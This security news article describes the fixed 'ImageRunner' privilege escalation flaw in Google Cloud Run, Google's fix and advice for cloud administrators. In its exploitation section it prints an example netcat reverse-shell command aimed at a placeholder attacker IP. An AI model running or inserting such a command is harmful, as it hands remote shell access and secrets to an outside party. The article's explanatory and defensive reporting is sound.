A significant security vulnerability in Google Cloud Platform (GCP) that could have allowed attackers to access private container images stored in Google Artifact Registry and Google Container Registry.
The vulnerability, dubbed โImageRunner,โ has been fixed but highlights a concerning privilege escalation path that puts sensitive cloud resources at risk.The ImageRunner VulnerabilityTenable Research reports that the vulnerability affects Google Cloud Run, a fully managed service for running containerized applications in a serverless environment.
At its core, the issue stems from how Cloud Run handles permissions during the container deployment process.
Identities with edit permissions on Cloud Run revisions (run.services.update and iam.serviceAccounts.actAs) could exploit this vulnerability to access private container images even without having the normally required registry permissions (Storage Object Viewer or Artifact Registry Reader).
When users deploy a Cloud Run service, a new โrevisionโ is created, representing a specific version of the deployed service.
During this process, Cloud Run relies on a service agent to pull container images from registries. This service agent has elevated permissions to facilitate the deployment process.
Exploitation Method >>>
An attacker exploiting this vulnerability could:
Control an identity with run.services.update and iam.serviceAccounts.actAs permissionsUpdate a running Cloud Run service and edit a new revisionSpecify any private container image within the same projectInject malicious instructions as arguments or commandsFor example, an attacker could specify a private โncatโ image and add the following command to establish a reverse shell: nc [attacker_ip] [port] -e /bin/bash.
Once executed, the attacker gains access to the container and can inspect its contents, extract secrets, or exfiltrate sensitive data.
The attack works because the Cloud Functionโs service agent (service-PROJECT_NUMBER@gcf-admin-robot.iam.gserviceaccount.com) has the necessary permissions to pull images, and this privilege is effectively โborrowedโ by the attacker.
The ImageRunner vulnerability exemplifies what Tenable Research calls the โJengaยฎโ concept, where cloud services built on top of other services inherent security risks. If one underlying service is compromised, the services built above it become vulnerable as well.
This vulnerability pattern has been observed across major cloud providers and introduces significant challenges for security teams trying to protect cloud infrastructures.
Google addressed the vulnerability by implementing a critical security control: the principal creating or updating a Cloud Run resource now needs explicit permission to access the container images being deployed.
Specifically, when using Artifact Registry, the principal must have the Artifact Registry Reader (roles/artifactregistry.reader) IAM role on the project or repository containing the container images.
The fix was fully rolled out to production on January 28, 2025, with advance notifications sent to affected Project, Folder, and Organization owners in November 2024.
Recommendations for Cloud Admins >>>
Organizations using the Google Cloud Platform should:
Ensure IAM permissions follow the least privileged principlesVerify that identities with appropriate registry permissions perform all Cloud Run deploymentsMonitor for suspicious Cloud Run revision updatesConsider implementing additional security controls for container deploymentsThis vulnerability reminds us that cloud security requires vigilance against complex privilege escalation paths that might not be immediately obvious in modern multi-service architectures.